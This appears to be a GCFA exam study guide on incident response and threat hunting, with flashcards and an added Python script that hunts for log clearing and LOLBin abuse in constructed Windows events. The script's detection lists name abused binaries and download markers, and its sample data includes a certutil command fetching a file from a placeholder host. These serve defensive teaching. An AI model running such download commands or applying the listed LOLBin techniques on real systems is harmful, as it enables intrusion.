High-Yield GCFA Facts — IR & Threat Hunting
Fact | Answer
PICERL — full expansion in order | Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned
Most volatile evidence source (collect first) | RAM (physical memory) — lost on shutdown
Event ID for Security Log cleared (defense evasion) | Event ID 1102 (Security log cleared); Event ID 104 (System log cleared)
ATT&CK tactic with the most techniques | Defense Evasion (TA0005)
Pyramid of Pain — highest level indicator | TTPs — Tactics, Techniques & Procedures (hardest for attacker to change)
Pyramid of Pain — lowest level indicator | Hash Values — trivial to change by recompiling malware
ATT&CK tactic covering LSASS dumping with Mimikatz | Credential Access (TA0006) — T1003.001
Purpose of a write blocker | Prevents any write commands to original evidence — allows read without modification
Hunting maturity level that uses hypothesis-driven TTPs | Level 2 — Procedural (uses documented hunting procedures based on ATT&CK)
RFC 3227 | Guidelines for Evidence Collection and Archiving — defines order of volatility

Flashcards

Framework

What does PICERL stand for and what is the critical rule about Eradication?

Answer

Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. Critical rule: never eradicate BEFORE thorough forensic analysis — premature cleanup destroys evidence needed to understand the full scope of the intrusion.

Concept

What is the order of volatility and why does it matter?

Answer

Evidence collection priority from most to least volatile: RAM → Swap → Network state → Running processes → Disk → Remote logs → Archives. It matters because volatile evidence disappears when power is removed — lose RAM and you lose fileless malware, decryption keys, and live attacker connections forever.

Distinction

What is the difference between an IOC and an IOA, and which is harder to evade?

Answer

IOC = artifact of past compromise (hash, IP, domain) — reactive, easily evaded by changing the artifact. IOA = behavioral evidence of attacker actions in progress (credential dumping, LOLBin abuse) — harder to evade because changing TTPs requires retooling the entire attack methodology.

Framework

What is the Pyramid of Pain and what sits at its top?

Answer

David Bianco's model ranking indicators by pain caused to attackers when detected. Bottom (trivial): Hashes. Then: IPs, Domains, Network/Host Artifacts, Tools. Top (tough!): TTPs. Higher on the pyramid = harder for the attacker to change = more valuable for defenders to detect.

Framework

Name the 14 MITRE ATT&CK tactics in attack sequence order.

Answer

Reconnaissance → Resource Development → Initial Access → Execution → Persistence → Privilege Escalation → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → Command & Control → Exfiltration → Impact. (14 total; first 2 are pre-attack.)

Concept

What is threat hunting and what is its core assumption?

Answer

Threat hunting: proactive, hypothesis-driven search for threats that have evaded automated detection. Core assumption: assume breach — the adversary is already inside and operating undetected. Unlike alert-driven IR, hunting does not wait for alerts — it actively seeks threats through behavioral analysis.

Evidence

What are the three non-negotiable requirements for forensically sound evidence?

Answer

1. Write blocker — prevents modification of original evidence during acquisition. 2. Hash verification — SHA-256 hash before and after imaging proves no change occurred. 3. Chain of custody — unbroken documented record of all handling. All three required for legal admissibility.

ATT&CK

What ATT&CK tactic is most heavily populated, and what Windows Event IDs indicate an attacker attempted it?

Answer

Defense Evasion (TA0005) — the most populated ATT&CK tactic. Key Event IDs: 1102 (Security log cleared) and 104 (System log cleared) — direct evidence of attacker log tampering. Also: timestomping (T1070.006), masquerading, obfuscation, and LOLBin abuse all fall under Defense Evasion.


Exam Strategy — IR & Threat Hunting

  • PICERL sequence questions: The order is fixed. Any question about "what comes first" — Preparation is always before the incident. Containment preserves evidence while limiting spread; Eradication removes the threat only after analysis is complete.
  • Order of volatility: RAM = always first. Disk = survives power cycle. If a question asks "what to collect before shutdown" → memory. "What survives a reboot" → disk artifacts (Event Logs, registry, MFT).
  • IOC vs IOA: The exam loves this distinction. Key tell: if it's a hash/IP/domain → IOC. If it's behavior (credential dumping, LOLBin abuse, unusual process spawning) → IOA. IOAs survive attacker tooling changes; IOCs do not.
  • Pyramid of Pain top = TTPs: Any question about "what is hardest for attackers to change" or "what gives defenders the most advantage" → TTPs. The bottom of the pyramid (hashes) is trivially evaded.
  • ATT&CK tactic ID questions: Defense Evasion = TA0005. Initial Access = TA0001. Credential Access = TA0006. Know the most tested: Persistence (TA0003), Defense Evasion (TA0005), Lateral Movement (TA0008).

Common Mistakes to Avoid

  • Powering off before memory capture: The most common field mistake. Never pull the plug before acquiring RAM — fileless malware, encryption keys, and C2 connections only exist in memory.
  • Running AV on live evidence: AV modifies files (quarantines, deletes), changes timestamps, and destroys forensic artifacts. Never run AV before forensic acquisition is complete.
  • Confusing IOC and IOA: "Attacker changes the malware hash" → the IOC is now useless. The IOA (behavior) remains valid. The exam will present scenarios where hash-based detection fails and test whether you know why.
  • Eradication before analysis: Premature eradication is the #1 mistake that causes re-compromise. If you clean up before finding all persistence mechanisms, the attacker is back in 24 hours.
  • Treating all 14 ATT&CK tactics as sequential: They are not strictly linear — adversaries often run multiple tactics simultaneously (Persistence + Defense Evasion happening at the same time). The order shown is a general progression, not a strict sequence.

Quick Review — Key Facts

  • PICERL: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned
  • Order of volatility (top 4): RAM → Swap/Page file → Network state → Running processes
  • Evidence integrity triad: Write blocker + Hash verification + Chain of custody
  • IOC: artifact (hash/IP/domain) — reactive, easily evaded
  • IOA: behavior — proactive, survives tool changes
  • Pyramid top: TTPs. Pyramid bottom: Hash values
  • 14 ATT&CK tactics: Recon → Resource Dev → Initial Access → Execution → Persistence → Privilege Esc → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → C2 → Exfiltration → Impact
  • Log cleared Event IDs: 1102 (Security), 104 (System)

Deep Dive — Advanced Concepts

  • Fileless malware and memory forensics: Modern APTs increasingly use fileless techniques — malware that runs entirely in memory with no disk artifact. The only way to detect it is RAM acquisition and memory forensics (Volatility). Event Log analysis and disk forensics alone will miss it entirely.
  • GDPR and IR tension: GDPR requires data minimization even during IR — you cannot collect employee personal data without legal basis. Many organizations use a legitimate interest basis for IR investigations but must document this. Cross-border evidence collection (EU data on US servers) triggers GDPR constraints regardless of where the investigation originates.
  • ATT&CK Navigator for gap analysis: The ATT&CK Navigator tool lets you layer your organization's detection coverage over ATT&CK techniques. Gaps in coverage reveal where a motivated adversary could operate undetected — directly informing threat hunting priorities.
  • Living-off-the-Land (LOLBins): Adversaries abuse legitimate Windows binaries (certutil.exe, mshta.exe, regsvr32.exe, wmic.exe) to execute malicious code. These bypass hash-based AV detection because the tools themselves are legitimate. Detection requires behavioral analysis — parent-child process anomalies, command-line argument inspection, and destination analysis. This is IOA territory.
  • Hunting at scale: Enterprise hunting requires centralizing telemetry across thousands of endpoints. Velociraptor is a GCFA-relevant tool for large-scale forensic artifact collection and hunting — it can collect specific artifacts (prefetch, event logs, registry) from thousands of endpoints simultaneously without full disk imaging.
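The LOLBin bullet above says detection is "IOA territory": parent-child anomalies and command-line inspection rather than hashes. The following is an added example (not from the FlashGenius page or any vendor tool) that runs that kind of hunt over a handful of constructed Windows event records, and at the same time flags the log-clearing Event IDs (1102 Security, 104 System) the Quick Review lists. The event records are simplified dicts rather than real EVTX output; the LOLBin set, the "suspicious parent" set, the command-line indicator strings and the per-binary ATT&CK mapping are this example's assumptions, and a production hunt would draw on a fuller catalogue such as LOLBAS and on your own baseline.

```python
"""Added example: IOA-style hunt over constructed 4688 / 1102 / 104 events.
Flags (1) audit log clearing (ATT&CK T1070.001) and (2) LOLBin abuse found
through parent-child anomalies and command-line inspection, not file hashes."""

# LOLBins named on the page; a real hunt would use a fuller list (assumption).
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "wmic.exe"}

# Document/mail/browser parents spawning a LOLBin: an assumed anomaly rule.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "acrord32.exe", "chrome.exe"}

# Command-line substrings that turn a legitimate tool into a download or
# execute primitive; assumed indicators, matched case-insensitively.
CMDLINE_INDICATORS = {
    "certutil.exe": ("urlcache", "-decode", "http"),
    "mshta.exe": ("http", "javascript:", "vbscript:"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "wmic.exe": ("process call create", "format:"),
}

# ATT&CK technique each binary is most often abused for (example's mapping).
LOLBIN_TECHNIQUE = {
    "certutil.exe": "T1105 / T1140",
    "mshta.exe": "T1218.005",
    "regsvr32.exe": "T1218.010",
    "wmic.exe": "T1047",
}

# (Event ID, channel) pairs that mean an audit log was cleared.
LOG_CLEARED = {
    (1102, "Security"): "Security log cleared",
    (104, "System"): "System log cleared",
}


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules match regardless of directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: list) -> list:
    """Return one finding per suspicious event, tagged with an ATT&CK technique."""
    findings = []
    for ev in events:
        key = (ev.get("event_id"), ev.get("channel"))
        if key in LOG_CLEARED:
            findings.append({"record": ev["record"], "technique": "T1070.001",
                             "reason": LOG_CLEARED[key]})
            continue
        if ev.get("event_id") != 4688:      # only process-creation events below
            continue
        image = basename(ev.get("image", ""))
        if image not in LOLBINS:
            continue
        parent = basename(ev.get("parent", ""))
        cmd = ev.get("cmdline", "").lower()
        reasons = []
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"{image} spawned by {parent}")
        hits = [m for m in CMDLINE_INDICATORS[image] if m in cmd]
        if hits:
            reasons.append("command line contains " + ", ".join(hits))
        if reasons:                          # benign admin use of the tool is not flagged
            findings.append({"record": ev["record"],
                             "technique": LOLBIN_TECHNIQUE[image],
                             "reason": "; ".join(reasons)})
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4688, "channel": "Security",
     "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"record": 2, "event_id": 4688, "channel": "Security",   # benign admin use
     "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -store My"},
    {"record": 3, "event_id": 4688, "channel": "Security",   # Word spawning mshta
     "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"mshta.exe C:\Users\Public\update.hta"},
    {"record": 4, "event_id": 1102, "channel": "Security", "user": r"CORP\svc_backup"},
    {"record": 5, "event_id": 4624, "channel": "Security"},  # ordinary logon, ignored
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"record {f['record']}: {f['technique']} - {f['reason']}")
```

Record 2 is the point of the exercise: the same certutil.exe binary, same hash, is left alone because neither its parent nor its command line is anomalous, while records 1 and 3 are flagged on behaviour alone. That is the IOC-versus-IOA distinction the exam tests, expressed as a hunt you could re-run after the attacker recompiles or renames the tool.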

Practice Tips

  • Map every scenario to PICERL: For any IR scenario question, identify which phase you're in first — this immediately narrows the correct action. "Active intrusion discovered" → Containment phase. "Malware removed, monitoring for re-infection" → Recovery phase.
  • Practice the Pyramid from memory: Draw the 6 levels without looking. Then for each level, write one concrete example. This builds the pattern recognition needed for scenario-based questions.
  • Build ATT&CK technique-to-evidence mappings: For the most common techniques (PowerShell, WMI, LSASS dumping, log clearing, lateral movement), know the specific Event IDs and forensic artifacts. This links Domain 1 (IR) to Domains 2-4 (Windows forensics, memory analysis, timeline).
  • Practice hunt hypothesis writing: Take any ATT&CK technique and write a hunting hypothesis for it. Then identify what data sources you'd query and what anomalies you'd look for. This is core to GCFA practical thinking.
  • Learn Event IDs 4624, 4625, 4648, 4688, 4698, 4702, 7045, 1102, 104: These are the most commonly tested Event IDs in GCFA scenarios. Know what each one means, which log it appears in, and what attacker activity it may indicate.